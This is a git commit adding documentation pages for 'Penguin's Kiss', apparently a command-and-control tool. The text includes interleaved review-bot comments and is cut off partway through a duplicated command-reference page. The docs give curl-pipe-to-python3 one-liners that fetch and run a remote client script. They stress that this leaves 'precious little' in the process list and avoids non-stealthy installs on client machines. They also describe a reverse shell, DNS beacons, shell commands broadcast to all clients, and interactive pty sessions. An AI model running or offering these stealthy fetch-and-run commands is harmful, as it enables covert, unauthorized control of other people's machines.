| author | Carson Fleming <cflems@cflems.net> | 2025-01-24 20:57:54 -0500 |
|---|---|---|
| committer | Carson Fleming <cflems@cflems.net> | 2025-01-24 20:57:54 -0500 |
| commit | 20e78c828e3995371a5ed29f3f53514370b7c152 (patch) | |
| tree | e8d738d41be5cb9c657babf66facb8ef7459abab | |
| download | pk-20e78c828e3995371a5ed29f3f53514370b7c152.tar.gz | |
host docs here now
| -rw-r--r-- | .github/workflows/live.yml | 42 | ||||
| -rw-r--r-- | client.php | 75 | ||||
| -rw-r--r-- | commands.php | 156 | ||||
| -rw-r--r-- | hdb.php | 48 | ||||
| -rw-r--r-- | include/footer.php | 3 | ||||
| -rw-r--r-- | include/header.php | 57 | ||||
| -rw-r--r-- | include/meta.php | 6 | ||||
| -rw-r--r-- | index.php | 59 | ||||
| -rw-r--r-- | live/client.html | 132 | ||||
| -rw-r--r-- | live/commands.html | 213 | ||||
| -rw-r--r-- | live/css/control.css | 134 | ||||
| -rw-r--r-- | live/favicon.ico | bin | 0 -> 4286 bytes | |||
| -rw-r--r-- | live/fonts/opensans.woff2 | bin | 0 -> 279056 bytes | |||
| -rw-r--r-- | live/fonts/source-code-pro.woff2 | bin | 0 -> 84120 bytes | |||
| -rw-r--r-- | live/hdb.html | 105 | ||||
| -rw-r--r-- | live/img/banner.png | bin | 0 -> 40887 bytes | |||
| -rw-r--r-- | live/img/banner.webp | bin | 0 -> 11346 bytes | |||
| -rw-r--r-- | live/img/logo.png | bin | 0 -> 28143 bytes | |||
| -rw-r--r-- | live/img/logo.webp | bin | 0 -> 5860 bytes | |||
| -rw-r--r-- | live/index.html | 116 | ||||
| -rw-r--r-- | live/server.html | 131 | ||||
| -rw-r--r-- | makefile | 6 | ||||
| -rw-r--r-- | server.php | 74 |
23 files changed, 1357 insertions, 0 deletions
diff --git a/.github/workflows/live.yml b/.github/workflows/live.yml new file mode 100644 index 0000000..e06e8ac --- /dev/null +++ b/.github/workflows/live.yml @@ -0,0 +1,42 @@ +# Simple workflow for deploying static content to GitHub Pages +name: Deploy static content to Pages + +on: + # Runs on pushes targeting the default branch + push: + branches: ["docs"] + + # Allows you to run this workflow manually from the Actions tab + workflow_dispatch: + +# Sets permissions of the GITHUB_TOKEN to allow deployment to GitHub Pages +permissions: + contents: read + pages: write + id-token: write + +# Allow only one concurrent deployment, skipping runs queued between the run in-progress and latest queued. +# However, do NOT cancel in-progress runs as we want to allow these production deployments to complete. +concurrency: + group: "pages" + cancel-in-progress: false + +jobs: + # Single deploy job since we're just deploying + deploy: + environment: + name: github-pages + url: ${{ steps.deployment.outputs.page_url }} + runs-on: ubuntu-latest + steps: + - name: Checkout + uses: actions/checkout@v4 + - name: Setup Pages + uses: actions/configure-pages@v5 + - name: Upload artifact + uses: actions/upload-pages-artifact@v3 + with: + path: 'live' + - name: Deploy to GitHub Pages + id: deployment + uses: actions/deploy-pages@v4 diff --git a/client.php b/client.php new file mode 100644 index 0000000..e9993f4 --- /dev/null +++ b/client.php 
@@ -0,0 +1,75 @@ +<!DOCTYPE html> +<html lang="en"> + <head> +<?php +require('include/meta.php'); +?> + <title>Client Configuration | Docs | Penguin's Kiss</title> + <link rel="canonical" href="https://c2.pkctl.org/client" /> + </head> +<?php +require('include/header.php'); +?> + <p>As you may have noticed reading the precompiled scripts section, the client binary + allows configuration options to be passed in a number of ways. The first thing it + will look for, for any given option, is a specifically-named environment variable, + as this will not be visible in the process name. Failing this, the client will try + less subtle approaches, looking for positional command-line arguments, prompting + the standard input, and finally falling back to a preset default value (which you + may find it useful to alter the script in order to tweak if you don't want to + pass anything in through the alternative methods.) Generally your run command will + look something like:</p> + <pre>curl -s https://dl.pkctl.org/pk.py | OPT1=val1 OPT2=val2... python3 -</pre> + <p>This has the distinct advantage as only showing up as <code>python3 -</code> in the + process list, which leaves precious little to identify what it is actually doing. + For this reason, environment variable input is highly recommended.</p> + <section id="hdb"> + <h3>HDB URL</h3> + <p>Unless your server is using the default server key (not recommended), you will + need to specify a URL from which the server's public RSA key can be + fetched. 
The format of this file can be found in the + <a href="/hdb">Hosts Database</a> + section of the documentation.</p> + <p>Environment Variable Name: <code>HDB</code></p> + <p>Command-Line Argument Order: first</p> + <p>Default Value: <code>https://war.cflems.net/hosts.json</code></p> + <p>Usage:</p> + <pre>curl -s https://dl.pkctl.org/pk.py | HDB=https://dl.pkctl.org/b8ca2180.json python3 -</pre> + </section> + <section id="host"> + <h3>TCP Host</h3> + <p>This is the TCP host to which your client will attempt to connect at a specified + interval. You will most invariably want to specify or recode this parameter. + Port number is optional and specified with a colon in the hostname.</p> + <p>Environment Variable Name: <code>HOST</code></p> + <p>Command-Line Argument Order: second</p> + <p>Default Value: <code>sek.cflems.net:2236</code></p> + <p>Usage:</p> + <pre>curl -s https://dl.pkctl.org/pk.py | HOST=raw.pkctl.org python3 -</pre> + </section> + <section id="tts"> + <h3>Time to Sleep</h3> + <p>This is the interval at which the client will wake up and attempt to establish + a connection to the remote server, if it does not succeed immediately. Unit is + seconds.</p> + <p>Environment Variable Name: <code>TTS</code></p> + <p>Command-Line Argument Order: third</p> + <p>Default Value: <code>1800</code> (30 minutes)</p> + <p>Usage:</p> + <pre>curl -s https://dl.pkctl.org/pk.py | TTS=86400 python3 -</pre> + </section> + <section id="bits"> + <h3>RSA Bits</h3> + <p>Can be used to turn down the bits used for RSA keys and messages for faster + operation at the expense of security. Needs to be synced between the client + and server. I recommend leaving this value alone.</p> + <p>Environment Variable Name: <code>BITS</code></p> + <p>Command-Line Argument Order: fourth</p> + <p>Default Value: <code>4096</code></p> + <p>Usage:</p> + <pre>curl -s https://dl.pkctl.org/pk.py | BITS=2048 python3 -</pre> + </section> +<?php +require('include/footer.php'); +?> +</html> 
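Review bot: In client.php, the `hdb` and `host` sections list defaults on the author's own domain (`https://war.cflems.net/hosts.json`, `sek.cflems.net:2236`) without stating the consequence: a client started with no options fetches its key from, and connects to, those hosts. The text only says "You will most invariably want to specify or recode this parameter"; say this explicitly next to each Default Value line, or document the defaults as placeholders. Wording fixes in the same hunk: "has the distinct advantage as only showing up" should read "of only showing up", and "most invariably" should be "almost invariably". The `bits` section says the value "Needs to be synced between the client and server" but not what happens on a mismatch; add that.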
diff --git a/commands.php b/commands.php new file mode 100644 index 0000000..0194e49 --- /dev/null +++ b/commands.php 
@@ -0,0 +1,156 @@ +<!DOCTYPE html> +<html lang="en"> + <head> +<?php +require('include/meta.php'); +?> + <title>Command Reference | Docs | Penguin's Kiss</title> + <link rel="canonical" href="https://c2.pkctl.org/commands" /> + </head> +<?php +require('include/header.php'); +?> + <p>The following commands can be executed while attached to the daemon via + <code>pkctl attach</code>.</p> + <section id="beacon"> + <h3>beacon</h3> + <p>Creates a DNS beacon that this host will respond to as if it were a legitimate + DNS server. If a beacon already exists at this hostname, record type, and + record class, it will be overwritten.</p> + <p>Arguments: DNS data (hex string), hostname (string), record type (string), + record class (string, optional).</p> + <p>DNS data must be a string representing the hex-encoded binary data to be + returned as the answer to a DNS query for this record.</p> + <p>Hostname is the DNS hostname for which to answer queries.</p> + <p>Record type must be one of A, AAAA, CNAME, MX, or TXT. Data must be formatted + correctly per record type or else malformed responses will be returned.</p> + <p>Record class must be one of IN, CH, or HS, or else omitted. Defaults to IN + (the internet).</p> + <p>Usage:</p> + <pre>pk> beacon 01020304 x.z.pkctl.org A IN</pre> + </section> + <section id="delbeacon"> + <h3>delbeacon</h3> + <p>Deletes one or more beacons according to arguments supplied. If only hostname + is supplied, all beacons matching hostname will be deleted. 
If more arguments + are supplied, the search will be narrowed accordingly.</p> + <p>Arguments: hostname (string), record type (string, optional), record class + (string, optional).</p> + <p>See <a href="#beacon">beacon reference</a> for the meanings of these arguments.</p> + <p>Usage:</p> + <pre>pk> delbeacon x.z.pkctl.org A IN</pre> + </section> + <section id="nbeacons"> + <h3>nbeacons</h3> + <p>Prints the number of currently active DNS beacons.</p> + <p>Usage:</p> + <pre>pk> nbeacons +[pk] Active beacons: 224</pre> + </section> + <section id="lbeacons"> + <h3>lbeacons</h3> + <p>Lists all currently active DNS beacons and their data.</p> + <p>Usage:</p> + <pre>pk> lbeacons +[pk] Active beacons: +- x.z.pkctl.org A IN: 01020304 +- ... +[pk] 224 total.</pre> + </section> + <section id="nscreen"> + <h3>nscreen</h3> + <p>Prints the number of currently attached controller screens.</p> + <p>Usage:</p> + <pre>pk> nscreen +[pk] Active screens: 2</pre> + </section> + <section id="ncli"> + <h3>ncli</h3> + <p>Prints the number of currently connected TCP clients.</p> + <p>Usage:</p> + <pre>$ ncli +[pk] Active TCP clients: 27</pre> + </section> + <section id="lcli"> + <h3>lcli</h3> + <p>Lists the currently connected TCP clients and their descriptive information.</p> + <pre>$ lcli +[pk] Active TCP clients: +- 0: {'ip': '127.0.0.1', 'rport': 47874, 'rdns': 'localhost'} +- ... 
+[pk] 27 total.</pre> + </section> + <section id="lq"> + <h3>lq</h3> + <p>Lists the queue of commands to be executed by newly connected clients.</p> + <p>Usage:</p> + <pre>pk> lq +['whoami', 'hostname']</pre> + </section> + <section id="cq"> + <h3>cq</h3> + <p>Clears the command queue.</p> + <p>Usage:</p> + <pre>pk> cq</pre> + </section> + <section id="show-serverkey"> + <h3>show-serverkey</h3> + <p>Prints the server's public key in a format easily copyable into an HDB + entry.</p> + <p>Usage:</p> + <pre>pk> show-serverkey +{"n": ..., "e": ...}</pre> + </section> + <section id="pty"> + <h3>pty</h3> + <p>Connects your screen to the specified client in a one-on-one terminal session, + similar to SSHing into the client machine.</p> + <p>Arguments: client ID (integer) — can be found with <code>lcli</code>.</p> + <p>Usage:</p> + <pre>$ pty 3</pre> + </section> + <section id="refresh-hdb"> + <h3>refresh-hdb</h3> + <p>Commands the client to refresh its internal hosts database from the web resource + it was originally pulled from.</p> + <p>Usage:</p> + <pre>$ refresh-hdb</pre> + </section> + <section id="tunnel"> + <h3>tunnel</h3> + <p>Commands the client to disconnect and sleep for the number of seconds configured + in <a href="/client#tts">TTS</a>.</p> + <p>Usage:</p> + <pre>$ tunnel</pre> + </section> + <section id="die"> + <h3>die</h3> + <p>Commands the client to exit and not respawn.</p> + <p>Usage:</p> + <pre>$ die</pre> + </section> + <section id="shell"> + <h3>Shell Commands</h3> + <p>Inputs which are not recognized as server commands will be interpreted as + shell commands, which will be blasted to all connected clients and queued for + future clients to receive as well. Once executed, the results of these + commands will be blasted to all active screens, and logged in case no screen + is watching at the time of the response. 
The active command queue can be + managed by way of the <a href="#lq">lq</a> and <a href="#cq">cq</a> + commands.</p> + </section> + <section id="target"> + <h3>Targeting</h3> + <p>In the event that you would prefer not to dispatch a command to all current and + future clients, a specific set of targets can be specified by prepending + <code>TARGET={targets}</code> to the command, where <code>{targets}</code> is + a comma-delimited list of client IDs (integers). These client IDs can be + retrieved by checking the output of <code>lcli</code>. Commands which are + targeted are not queued for future clients to receive.</p> + <p>Usage:</p> + <pre>$ TARGET=0,4,57,264 echo hello</pre> + </section> +<?php +require('include/footer.php'); +?> +</html> 
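Review bot: The `refresh-hdb`, `tunnel` and `die` sections in commands.php each say they command "the client" but take no client ID and do not say whether they apply to every connected client, are queued like shell commands, or honour the `TARGET=` prefix; for a command that makes clients exit and not respawn, the scope needs to be documented. The usage prompts are also inconsistent: the beacon commands, `nscreen`, `lq`, `cq` and `show-serverkey` use `pk>`, while `ncli`, `lcli`, `pty`, `refresh-hdb`, `tunnel`, `die` and the Targeting example use `$`. Pick one prompt or explain the difference, and add the "Usage:" line that `lcli` is missing.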
@@ -0,0 +1,48 @@ +<!DOCTYPE html> +<html lang="en"> + <head> +<?php +require('include/meta.php'); +?> + <title>Hosts Database | Docs | Penguin's Kiss</title> + <link rel="canonical" href="https://c2.pkctl.org/hdb" /> + </head> +<?php +require('include/header.php'); +?> + <p>Now that we've generated our host key and gotten our server up and running, its + time to publish its public key in a hosts database file so that it can be retrieved + by clients. The TL;DR for this section is to create a file that looks like this:</p> + <pre>{"keys": {"<server ip>": {"n": <number n that python spit out>, "e": 65537}}}</pre> + <p>and upload it to the web somewhere. You can then supply this URL to your clients as + your hosts database. Literally even a PasteBin will work if you use the raw file + URL.</p> + <section id="format"> + <h3>Format</h3> + <p>The hosts database is essentially just a JSON object in which the PK client will + look for specific keys to retrieve information. The basic skeleton looks like + this:</p> + <pre>{"keys": {<keys section>}}</pre> + </section> + <section id="keys"> + <h3>Keys Section</h3> + <p>The keys section is just a mapping from server IPs to key objects, which in + turn are just a way of representing RSA public keys. The keys section supports + multiple server IPs, but currently only one public key per server IP. Its + skeleton looks like the following:</p> + <pre>{"0.1.2.3": {<key object>}, "255.255.255.255": {<key object>}}</pre> + <h4>Key Objects</h4> + <p>A key object is just a modulus and a public exponent, both of which are integers. + The modulus is at key <code>n</code> and the public exponent is at key + <code>e</code>. The public exponent is optional and defaults to + <code>65537</code> if not supplied. These values can be pulled directly from + <code>/etc/pk/server_key.json</code>, but it is important to delete the + <code>d</code> key and its value, as this information needs to remain secret. 
+ </p> + <p>The format of a key object is as follows:</p> + <pre>{"n": 3043289324798327498257285749857984257249857245, "e": 12345}</pre> + </section> +<?php +require('include/footer.php'); +?> +</html> diff --git a/include/footer.php b/include/footer.php new file mode 100644 index 0000000..d23523b --- /dev/null +++ b/include/footer.php @@ -0,0 +1,3 @@ + </div> + </div> + </body> diff --git a/include/header.php b/include/header.php new file mode 100644 index 0000000..1189159 --- /dev/null +++ b/include/header.php 
@@ -0,0 +1,57 @@ + <body> + <header id="banner"> + <a id="banner-logo" href="/"> + <img id="logo-img" src="/img/banner.webp" alt="Penguin's Kiss Banner" /> + </a> + <div id="banner-buttons"> + <a class="button" href="https://github.com/cflems/pk">GitHub</a> + <a class="button" href="https://github.com/cflems/pk/releases">Download</a> + </div> + </header> + <div id="page"> + <nav id="navigation"> + <h3 class="nav-heading"><a href="/">About PK</a></h3> + <ul class="nav-section"> + <li><a href="/#download">Downloading</a></li> + <li><a href="/#build">Building</a></li> + <li><a href="/#precompiled">Precompiled</a></li> + </ul> + <h3 class="nav-heading"><a href="/client">Client Config</a></h3> + <ul class="nav-section"> + <li><a href="/client#tts">Time to Sleep</a></li> + <li><a href="/client#bits">RSA Bits</a></li> + </ul> + <h3 class="nav-heading"><a href="/server">Server Config</a></h3> + <ul class="nav-section"> + <li><a href="/server#install">Installing</a></li> + <li><a href="/server#pkctl">PKCTL Usage</a></li> + <li><a href="/server#keygen">Host Key Generation</a></li> + <li><a href="/server#users">Local Users</a></li> + </ul> + <h3 class="nav-heading"><a href="/hdb">Hosts Database</a></h3> + <ul class="nav-section"> + <li><a href="/hdb#format">Format</a></li> + <li><a href="/hdb#keys">Keys Section</a></li> + <!-- Routes here soon. 
:) --> + </ul> + <h3 class="nav-heading"><a href="/commands">Command Reference</a></h3> + <ul class="nav-section"> + <li><a href="/commands#beacon">beacon</a></li> + <li><a href="/commands#delbeacon">delbeacon</a></li> + <li><a href="/commands#nbeacons">nbeacons</a></li> + <li><a href="/commands#lbeacons">lbeacons</a></li> + <li><a href="/commands#nscreen">nscreen</a></li> + <li><a href="/commands#ncli">ncli</a></li> + <li><a href="/commands#lcli">lcli</a></li> + <li><a href="/commands#lq">lq</a></li> + <li><a href="/commands#cq">cq</a></li> + <li><a href="/commands#show-serverkey">show-serverkey</a></li> + <li><a href="/commands#pty">pty</a></li> + <li><a href="/commands#refresh-hdb">refresh-hdb</a></li> + <li><a href="/commands#tunnel">tunnel</a></li> + <li><a href="/commands#die">die</a></li> + <li><a href="/commands#shell">Shell Commands</a></li> + <li><a href="/commands#target">Targeting</a></li> + </ul> + </nav> + <div id="content"> diff --git a/include/meta.php b/include/meta.php new file mode 100644 index 0000000..ca4383c --- /dev/null +++ b/include/meta.php @@ -0,0 +1,6 @@ + <meta charset="utf-8" /> + <meta name="viewport" content="width=device-width, initial-scale=1.0" /> + <meta name="author" content="Carson Fleming" /> + <meta name="description" content="Harness encrypted client-server communication, asynchronous command distribution, terminal emulation, and support for unlimited clients and controllers with Penguin's Kiss, the ultimate tool to manage remotely controlled devices with security and convenience." /> + <link rel="icon" type="image/x-icon" href="/favicon.ico" /> + <link rel="stylesheet" type="text/css" href="/css/control.css" /> diff --git a/index.php b/index.php new file mode 100644 index 0000000..6a72074 --- /dev/null +++ b/index.php 
@@ -0,0 +1,59 @@ +<!DOCTYPE html> +<html lang="en"> + <head> +<?php +require('include/meta.php'); +?> + <title>Penguin's Kiss Command & Control Software | Penguin's Kiss</title> + <link rel="canonical" href="https://c2.pkctl.org/" /> + </head> +<?php +require('include/header.php'); +?> + <p>Penguin's Kiss is command and control software designed to accomodate a large + number of clients and controllers at once. Multiple channels are available for + end-to-end encrypted delivery of shell commands, including direct TCP reverse + shell, DNS beacon, and beacon-triggered direct connection. All information is sent + encrypted, either by padded RSA or by one-time pad exchanged over RSA (this helps + to keep short data snippets responsive and avoid ballooning message size). In the + future, some work may be done to incorporate elliptic curve cryptography and + one-time session keys utilizing some symmetric cipher (likely AES).</p> + <section id="download"> + <h3>Downloading PK</h3> + <p>The quickest way to download is via the button in the top right. This will take + you to the latest release on + <a href="https://github.com/cflems/pk">GitHub</a>. You can also clone the + <a href="https://github.com/cflems/pk/tree/master">master</a> (pseudo-stable) + or + <a href="https://github.com/cflems/pk/tree/develop">develop</a> (unstable) + branches to receive feature updates before they are bundled into a full + release.</p> + </section> + <section id="build"> + <h3>Building PK</h3> + <p>PK doesn't require much in the way of compilation, just bundling into a + single script that can be distributed or run. This functionality is written in + the makefile for easy access, so fetching and compilation should be as simple + as:</p> + <pre># or tar -xzf pk.tgz if you've downloaded an archive +git clone git@github.com:cflems/pk.git +cd pk +make</pre> + <p>Your built artifacts will be <code>pkcli.py</code> and <code>pkd.py</code>. 
+ Building is required before PK can be run for the first time.</p> + </section> + <section id="precompiled"> + <h3>Precompiled Client Scripts</h3> + <p>Since cloning and building the latest version isn't the stealthiest + procedure to execute on a client machine, prebuilt versions of the latest + client script will be hosted in the several locations and can be executed + without meaningful process footprint as follows:</p> + <pre>curl -s https://dl.pkctl.org/pk.py | ENV=... python3 -</pre> + <pre>curl -s https://war.cflems.net/pk.py | ENV=... python3 -</pre> + <p>You may wish to host your own, however, in order to tweak the default values + to your needs and avoid feeding them via enviornment variables.</p> + </section> +<?php +require('include/footer.php'); +?> +</html> diff --git a/live/client.html b/live/client.html new file mode 100644 index 0000000..8d2f617 --- /dev/null +++ b/live/client.html 
@@ -0,0 +1,132 @@ +<!DOCTYPE html> +<html lang="en"> + <head> + <meta charset="utf-8" /> + <meta name="viewport" content="width=device-width, initial-scale=1.0" /> + <meta name="author" content="Carson Fleming" /> + <meta name="description" content="Harness encrypted client-server communication, asynchronous command distribution, terminal emulation, and support for unlimited clients and controllers with Penguin's Kiss, the ultimate tool to manage remotely controlled devices with security and convenience." /> + <link rel="icon" type="image/x-icon" href="/favicon.ico" /> + <link rel="stylesheet" type="text/css" href="/css/control.css" /> + <title>Client Configuration | Docs | Penguin's Kiss</title> + <link rel="canonical" href="https://c2.pkctl.org/client" /> + </head> + <body> + <header id="banner"> + <a id="banner-logo" href="/"> + <img id="logo-img" src="/img/banner.webp" alt="Penguin's Kiss Banner" /> + </a> + <div id="banner-buttons"> + <a class="button" href="https://github.com/cflems/pk">GitHub</a> + <a class="button" href="https://github.com/cflems/pk/releases">Download</a> + </div> + </header> + <div id="page"> + <nav id="navigation"> + <h3 class="nav-heading"><a href="/">About PK</a></h3> + <ul class="nav-section"> + <li><a href="/#download">Downloading</a></li> + <li><a href="/#build">Building</a></li> + <li><a href="/#precompiled">Precompiled</a></li> + </ul> + <h3 class="nav-heading"><a href="/client">Client Config</a></h3> + <ul class="nav-section"> + <li><a href="/client#tts">Time to Sleep</a></li> + <li><a href="/client#bits">RSA Bits</a></li> + </ul> + <h3 class="nav-heading"><a href="/server">Server Config</a></h3> + <ul class="nav-section"> + <li><a href="/server#install">Installing</a></li> + <li><a href="/server#pkctl">PKCTL Usage</a></li> + <li><a href="/server#keygen">Host Key Generation</a></li> + <li><a href="/server#users">Local Users</a></li> + </ul> + <h3 class="nav-heading"><a href="/hdb">Hosts Database</a></h3> + <ul class="nav-section"> 
+ <li><a href="/hdb#format">Format</a></li> + <li><a href="/hdb#keys">Keys Section</a></li> + <!-- Routes here soon. :) --> + </ul> + <h3 class="nav-heading"><a href="/commands">Command Reference</a></h3> + <ul class="nav-section"> + <li><a href="/commands#beacon">beacon</a></li> + <li><a href="/commands#delbeacon">delbeacon</a></li> + <li><a href="/commands#nbeacons">nbeacons</a></li> + <li><a href="/commands#lbeacons">lbeacons</a></li> + <li><a href="/commands#nscreen">nscreen</a></li> + <li><a href="/commands#ncli">ncli</a></li> + <li><a href="/commands#lcli">lcli</a></li> + <li><a href="/commands#lq">lq</a></li> + <li><a href="/commands#cq">cq</a></li> + <li><a href="/commands#show-serverkey">show-serverkey</a></li> + <li><a href="/commands#pty">pty</a></li> + <li><a href="/commands#refresh-hdb">refresh-hdb</a></li> + <li><a href="/commands#tunnel">tunnel</a></li> + <li><a href="/commands#die">die</a></li> + <li><a href="/commands#shell">Shell Commands</a></li> + <li><a href="/commands#target">Targeting</a></li> + </ul> + </nav> + <div id="content"> + <p>As you may have noticed reading the precompiled scripts section, the client binary + allows configuration options to be passed in a number of ways. The first thing it + will look for, for any given option, is a specifically-named environment variable, + as this will not be visible in the process name. Failing this, the client will try + less subtle approaches, looking for positional command-line arguments, prompting + the standard input, and finally falling back to a preset default value (which you + may find it useful to alter the script in order to tweak if you don't want to + pass anything in through the alternative methods.) Generally your run command will + look something like:</p> + <pre>curl -s https://dl.pkctl.org/pk.py | OPT1=val1 OPT2=val2... 
python3 -</pre> + <p>This has the distinct advantage as only showing up as <code>python3 -</code> in the + process list, which leaves precious little to identify what it is actually doing. + For this reason, environment variable input is highly recommended.</p> + <section id="hdb"> + <h3>HDB URL</h3> + <p>Unless your server is using the default server key (not recommended), you will + need to specify a URL from which the server's public RSA key can be + fetched. The format of this file can be found in the + <a href="/hdb">Hosts Database</a> + section of the documentation.</p> + <p>Environment Variable Name: <code>HDB</code></p> + <p>Command-Line Argument Order: first</p> + <p>Default Value: <code>https://war.cflems.net/hosts.json</code></p> + <p>Usage:</p> + <pre>curl -s https://dl.pkctl.org/pk.py | HDB=https://dl.pkctl.org/b8ca2180.json python3 -</pre> + </section> + <section id="host"> + <h3>TCP Host</h3> + <p>This is the TCP host to which your client will attempt to connect at a specified + interval. You will most invariably want to specify or recode this parameter. + Port number is optional and specified with a colon in the hostname.</p> + <p>Environment Variable Name: <code>HOST</code></p> + <p>Command-Line Argument Order: second</p> + <p>Default Value: <code>sek.cflems.net:2236</code></p> + <p>Usage:</p> + <pre>curl -s https://dl.pkctl.org/pk.py | HOST=raw.pkctl.org python3 -</pre> + </section> + <section id="tts"> + <h3>Time to Sleep</h3> + <p>This is the interval at which the client will wake up and attempt to establish + a connection to the remote server, if it does not succeed immediately. 
Unit is + seconds.</p> + <p>Environment Variable Name: <code>TTS</code></p> + <p>Command-Line Argument Order: third</p> + <p>Default Value: <code>1800</code> (30 minutes)</p> + <p>Usage:</p> + <pre>curl -s https://dl.pkctl.org/pk.py | TTS=86400 python3 -</pre> + </section> + <section id="bits"> + <h3>RSA Bits</h3> + <p>Can be used to turn down the bits used for RSA keys and messages for faster + operation at the expense of security. Needs to be synced between the client + and server. I recommend leaving this value alone.</p> + <p>Environment Variable Name: <code>BITS</code></p> + <p>Command-Line Argument Order: fourth</p> + <p>Default Value: <code>4096</code></p> + <p>Usage:</p> + <pre>curl -s https://dl.pkctl.org/pk.py | BITS=2048 python3 -</pre> + </section> + </div> + </div> + </body> +</html> diff --git a/live/commands.html b/live/commands.html new file mode 100644 index 0000000..1cc28e1 --- /dev/null +++ b/live/commands.html 
@@ -0,0 +1,213 @@ +<!DOCTYPE html> +<html lang="en"> + <head> + <meta charset="utf-8" /> + <meta name="viewport" content="width=device-width, initial-scale=1.0" /> + <meta name="author" content="Carson Fleming" /> + <meta name="description" content="Harness encrypted client-server communication, asynchronous command distribution, terminal emulation, and support for unlimited clients and controllers with Penguin's Kiss, the ultimate tool to manage remotely controlled devices with security and convenience." /> + <link rel="icon" type="image/x-icon" href="/favicon.ico" /> + <link rel="stylesheet" type="text/css" href="/css/control.css" /> + <title>Command Reference | Docs | Penguin's Kiss</title> + <link rel="canonical" href="https://c2.pkctl.org/commands" /> + </head> + <body> + <header id="banner"> + <a id="banner-logo" href="/"> + <img id="logo-img" src="/img/banner.webp" alt="Penguin's Kiss Banner" /> + </a> + <div id="banner-buttons"> + <a class="button" href="https://github.com/cflems/pk">GitHub</a> + <a class="button" href="https://github.com/cflems/pk/releases">Download</a> + </div> + </header> + <div id="page"> + <nav id="navigation"> + <h3 class="nav-heading"><a href="/">About PK</a></h3> + <ul class="nav-section"> + <li><a href="/#download">Downloading</a></li> + <li><a href="/#build">Building</a></li> + <li><a href="/#precompiled">Precompiled</a></li> + </ul> + <h3 class="nav-heading"><a href="/client">Client Config</a></h3> + <ul class="nav-section"> + <li><a href="/client#tts">Time to Sleep</a></li> + <li><a href="/client#bits">RSA Bits</a></li> + </ul> + <h3 class="nav-heading"><a href="/server">Server Config</a></h3> + <ul class="nav-section"> + <li><a href="/server#install">Installing</a></li> + <li><a href="/server#pkctl">PKCTL Usage</a></li> + <li><a href="/server#keygen">Host Key Generation</a></li> + <li><a href="/server#users">Local Users</a></li> + </ul> + <h3 class="nav-heading"><a href="/hdb">Hosts Database</a></h3> + <ul class="nav-section"> 
+ <li><a href="/hdb#format">Format</a></li> + <li><a href="/hdb#keys">Keys Section</a></li> + <!-- Routes here soon. :) --> + </ul> + <h3 class="nav-heading"><a href="/commands">Command Reference</a></h3> + <ul class="nav-section"> + <li><a href="/commands#beacon">beacon</a></li> + <li><a href="/commands#delbeacon">delbeacon</a></li> + <li><a href="/commands#nbeacons">nbeacons</a></li> + <li><a href="/commands#lbeacons">lbeacons</a></li> + <li><a href="/commands#nscreen">nscreen</a></li> + <li><a href="/commands#ncli">ncli</a></li> + <li><a href="/commands#lcli">lcli</a></li> + <li><a href="/commands#lq">lq</a></li> + <li><a href="/commands#cq">cq</a></li> + <li><a href="/commands#show-serverkey">show-serverkey</a></li> + <li><a href="/commands#pty">pty</a></li> + <li><a href="/commands#refresh-hdb">refresh-hdb</a></li> + <li><a href="/commands#tunnel">tunnel</a></li> + <li><a href="/commands#die">die</a></li> + <li><a href="/commands#shell">Shell Commands</a></li> + <li><a href="/commands#target">Targeting</a></li> + </ul> + </nav> + <div id="content"> + <p>The following commands can be executed while attached to the daemon via + <code>pkctl attach</code>.</p> + <section id="beacon"> + <h3>beacon</h3> + <p>Creates a DNS beacon that this host will respond to as if it were a legitimate + DNS server. If a beacon already exists at this hostname, record type, and + record class, it will be overwritten.</p> + <p>Arguments: DNS data (hex string), hostname (string), record type (string), + record class (string, optional).</p> + <p>DNS data must be a string representing the hex-encoded binary data to be + returned as the answer to a DNS query for this record.</p> + <p>Hostname is the DNS hostname for which to answer queries.</p> + <p>Record type must be one of A, AAAA, CNAME, MX, or TXT. Data must be formatted + correctly per record type or else malformed responses will be returned.</p> + <p>Record class must be one of IN, CH, or HS, or else omitted. 
Defaults to IN + (the internet).</p> + <p>Usage:</p> + <pre>pk> beacon 01020304 x.z.pkctl.org A IN</pre> + </section> + <section id="delbeacon"> + <h3>delbeacon</h3> + <p>Deletes one or more beacons according to arguments supplied. If only hostname + is supplied, all beacons matching hostname will be deleted. If more arguments + are supplied, the search will be narrowed accordingly.</p> + <p>Arguments: hostname (string), record type (string, optional), record class + (string, optional).</p> + <p>See <a href="#beacon">beacon reference</a> for the meanings of these arguments.</p> + <p>Usage:</p> + <pre>pk> delbeacon x.z.pkctl.org A IN</pre> + </section> + <section id="nbeacons"> + <h3>nbeacons</h3> + <p>Prints the number of currently active DNS beacons.</p> + <p>Usage:</p> + <pre>pk> nbeacons +[pk] Active beacons: 224</pre> + </section> + <section id="lbeacons"> + <h3>lbeacons</h3> + <p>Lists all currently active DNS beacons and their data.</p> + <p>Usage:</p> + <pre>pk> lbeacons +[pk] Active beacons: +- x.z.pkctl.org A IN: 01020304 +- ... +[pk] 224 total.</pre> + </section> + <section id="nscreen"> + <h3>nscreen</h3> + <p>Prints the number of currently attached controller screens.</p> + <p>Usage:</p> + <pre>pk> nscreen +[pk] Active screens: 2</pre> + </section> + <section id="ncli"> + <h3>ncli</h3> + <p>Prints the number of currently connected TCP clients.</p> + <p>Usage:</p> + <pre>$ ncli +[pk] Active TCP clients: 27</pre> + </section> + <section id="lcli"> + <h3>lcli</h3> + <p>Lists the currently connected TCP clients and their descriptive information.</p> + <pre>$ lcli +[pk] Active TCP clients: +- 0: {'ip': '127.0.0.1', 'rport': 47874, 'rdns': 'localhost'} +- ... 
